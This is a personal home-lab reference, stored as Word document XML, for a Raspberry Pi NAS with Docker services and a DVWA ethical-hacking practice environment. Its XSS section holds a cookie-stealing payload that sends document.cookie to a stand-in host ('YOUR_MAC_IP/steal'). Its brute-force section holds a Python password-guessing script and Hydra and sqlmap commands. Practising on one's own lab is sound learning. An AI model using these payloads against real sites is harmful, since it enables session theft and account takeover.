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Raspberry Pi NAS &amp; Ethical Hacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Tools Guide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A step-by-step reference for all tools and services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C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pi IP Address: 192.168.0.169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1. SSH - Secure Shell Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH lets you remotely control your Raspberry Pi from your Mac or any computer on the network.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How to Connect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ssh username@192.168.0.169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SSH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Pi is powered on and ethernet light is blinking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 new IP in router at 192.168.0.1 under DHCP Client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sure SSH is enabled: sudo systemctl enable ssh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Useful SSH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username@192.168.0.169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to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status ssh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SSH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ssh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SSH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hostname -I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Pi IP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reboot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Reboot the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Disconnect from SSH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Fix SSH Key Warning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ssh-keygen -R 192.168.0.169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Set Static IP (Permanent Fix)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nano /etc/dhcpcd.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add at the bottom: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interface eth0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static ip_address=192.168.0.169/24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static routers=192.168.0.1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static domain_name_servers=8.8.8.8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2. OpenMediaVault (OMV) - NAS Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OMV is the web interface for managing your NAS storage, shared folders, and services.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How to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openmediavault (change this!)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OMV Web Interface Fails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nginx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openmediavault-engined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Key OMV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&gt; Disks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connected drives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&gt; File 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Mount and format drives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&gt; Shared Folders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shared folders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 &gt; SMB/CIFS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Windows file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&gt;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NAS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&gt;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OMV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&gt; Plugins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extra features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Connect to NAS from Devices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Samsung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My Files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Network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Windows Share (SMB)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IP: 192.168.0.169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Mac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smb://192.168.0.169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Windows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\\192.168.0.169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3. Docker - Container Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker lets you run applications in isolated containers on your Pi.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Start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enable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status docker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Essential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ps -a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containers including stopped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start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a container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stop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 container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restart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a container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rm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 container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logs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container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resource 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downloaded images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pull IMAGE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an image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Check All Running Services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ps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Docker Not Working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usermod -aG docker $USER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4. Portainer - Docker GUI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Portainer gives you a visual interface to manage all Docker containers in your browser.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How to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http://192.168.0.169:9000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chosen password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Start Portainer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start portainer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Install Portainer Fresh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volume create portainer_data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run -d -p 9000:9000 --name portainer --restart always -v /var/run/docker.sock:/var/run/docker.sock -v portainer_data:/data portainer/portainer-ce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Portainer Not Loading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restart portainer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logs portainer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5. DVWA - Ethical Hacking Practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA (Damn Vulnerable Web App) is a safe legal environment to practice ethical hacking techniques.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How to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http://192.168.0.169:8081/login.php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http://192.168.0.169:8081/setup.php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Start DVWA Services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mariadb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php8.4-fpm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nginx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If DVWA Not Loading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mariadb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php8.4-fpm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restart nginx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DVWA Security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security - learn basic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filters - learn bypasses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security - advanced techniques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Impossible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secure - study the defense code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Practice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password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system commands via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Inclusion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remote/local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malicious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 database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Reflected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 scripts via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Stored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script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 site request forgery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6. XSS Attacks - Practice Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross Site Scripting (XSS) is when malicious JavaScript is injected into a website.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Basic XSS Payloads to Practice on DVWA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&lt;script&gt;alert(1)&lt;/script&gt;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test - shows popup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&lt;script&gt;alert(document.cookie)&lt;/script&gt;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cookies in popup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&lt;img src=x onerror=alert(1)&gt;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tag bypass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&lt;svg onload=alert(1)&gt;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SVG tag bypass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&lt;body onload=alert(1)&gt;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tag bypass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Cookie Receiver - Run on Mac</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Save this as /tmp/receiver.py and run it on your Mac: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python3 /tmp/receiver.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Then inject this payload in DVWA XSS Stored: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&lt;script&gt;var i=new Image();i.src='http://YOUR_MAC_IP:8000/steal?c='+document.cookie;&lt;/script&gt;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Get Your Mac IP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ipconfig getifaddr en0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7. Brute Force Attacks - Practice Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force attacks try many passwords automatically until finding the correct one.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Python Brute Force Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Save as /tmp/brute.py and run on Mac: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python3 /tmp/brute.py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Script Code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import requests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url = 'http://192.168.0.169:8081/vulnerabilities/brute/'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cookies = {'PHPSESSID': 'YOUR_SESSION_ID', 'security': 'low'}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passwords = ['password','123456','admin','letmein']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for pwd in passwords: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params = {'username':'admin','password':pwd,'Login':'Login'}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 = requests.get(url, params=params, cookies=cookies)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if 'Welcome' in r.text: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print(f'[+] FOUND: {pwd}')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break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Get Session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DVWA in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Press F12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Application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Cookies on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 PHPSESSID value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8. Rclone - Google Drive Transfer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Rclone transfers files between Google Drive and your NAS.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Configure Google Drive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rclone config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow these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n for new 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it googledrive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drive for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Press Enter to skip Client ID and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1 for full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n for auto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 the link shown and open on Mac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with Google and Allow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rclone authorize command on Mac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Paste token back in Pi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n for shared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y to save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Transfer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lsd googledrive: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Google Drive folders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ls googledrive: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files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about googledrive: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storage usage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copy googledrive: /NAS/PATH --progress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all to NAS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sync googledrive: /NAS/PATH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to NAS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check googledrive: /NAS/PATH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transfer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Run Transfer Without Losing Progress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screen -S transfer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rclone copy googledrive: /srv/dev-disk-by-uuid-177679e3-05cc-4cbc-ad15-e725772c30bb/GoogleDrive --progress</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If SSH disconnects reconnect and run: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screen -r transfer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9. Kali Linux - Hacking Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux is a specialized Linux distribution with hundreds of security and hacking tools.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Start Kali Container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start kali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exec -it kali /bin/bash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Kali GUI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https://192.168.0.169:6901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kasm_user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set password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Install Kali Tools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update &amp;&amp; apt upgrade -y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nmap -y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metasploit-framework -y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hydra -y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sqlmap -y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apt install nikto -y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Essential Kali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scanning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 -sV TARGET_IP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Metasploit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msfconsole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Hydra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hydra -l admin -P passwords.txt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sqlmap -u URL --dbs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Nikto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scanning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nikto -h TARGET_IP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Aircrack-ng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aircrack-ng capture.cap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10. Quick Reference - All Services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All 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OMV Web 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openmediavault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Portainer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http://192.168.0.169:9000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your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http://192.168.0.169:8081/login.php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/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GUI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https://192.168.0.169:6901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kasm_user / your password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Start All Services at Once</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run these commands after every reboot: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mariadb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php8.4-fpm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nginx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start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start portainer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start dvwa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start kali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Check Everything is Running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systemctl status nginx mariadb php8.4-fpm docker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docker ps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Common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timeout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IP in router DHCP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OMV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docker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mariadb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Portainer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restart portainer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GUI blank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restart kali, wait 5 mins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 IP changed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router at 192.168.0.1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Important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/srv/dev-disk-by-uuid-177679e3-05cc-4cbc-ad15-e725772c30bb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/var/www/html/dvwa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/etc/nginx/sites-available/dvwa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/etc/ssh/sshd_config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Rclone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~/.config/rclone/rclone.conf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11. Ethical Hacking Learning Path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Current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OMV Web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Attacks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XSS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Brute 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Brute Force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SQL Injection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Command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Inclusion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File Inclusion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DVWA CSRF Section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Recommended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Academy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portswigger.net/web-security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hacking -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TryHackMe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tryhackme.com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Guided hacking labs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HackTheBox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hackthebox.com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world challenges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best practices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Certification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CompTIA Security+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Ethical hacking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Penetration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security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color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Always practice only on systems you own or have permission to test!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2026-03-08T16:24:00.519Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-08T16:24:00.519Z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